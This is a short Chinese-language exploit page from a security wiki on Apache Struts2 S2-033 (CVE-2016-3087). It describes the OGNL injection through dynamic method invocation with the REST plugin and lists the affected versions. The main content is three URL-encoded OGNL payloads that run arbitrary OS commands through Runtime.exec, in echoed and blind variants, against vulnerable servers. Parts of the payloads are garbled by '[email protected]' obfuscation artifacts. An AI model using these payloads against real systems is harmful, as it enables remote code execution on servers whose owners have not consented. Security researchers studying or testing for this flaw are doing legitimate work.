menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2016-3087)s2-033 chevron_right (CVE-2016-3087)s2-033.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2016-3087)s2-033.md
    1.4 KB / 2021-07-15 19:48:30
        (CVE-2016-3087)s2-033
    =======================
    
    一、漏洞简介
    ------------
    
    当开启动态方法调用,并且同时使用了Strut2 REST
    Plugin插件时,使用"!"操作符调用动态方法可能执行ognl表达式,导致代码执行。
    
    二、漏洞影响
    ------------
    
    Struts 2.3.20 - Struts Struts 2.3.28(2.3.20.3和2.3.24.3除外)
    
    三、复现过程
    ------------
    
    ### POC
    
    有回显版本
    
        %23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23process%[email protected]@getRuntime%28%29.exec%28%23parameters.command[0]),%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%2C%23ros.flush%28%29,%23xx%3d123,%23xx.toString.json?&command=whoami
    
    图片.png
    
    光有回显
    
        %23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=id
    
    没回显
    
        %23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime%28%29.exec%28%23parameters.command[0]),%23xx%3d123,%23xx.toString.json?&command=touch%20/tmp/success
    
    
    links
    file_download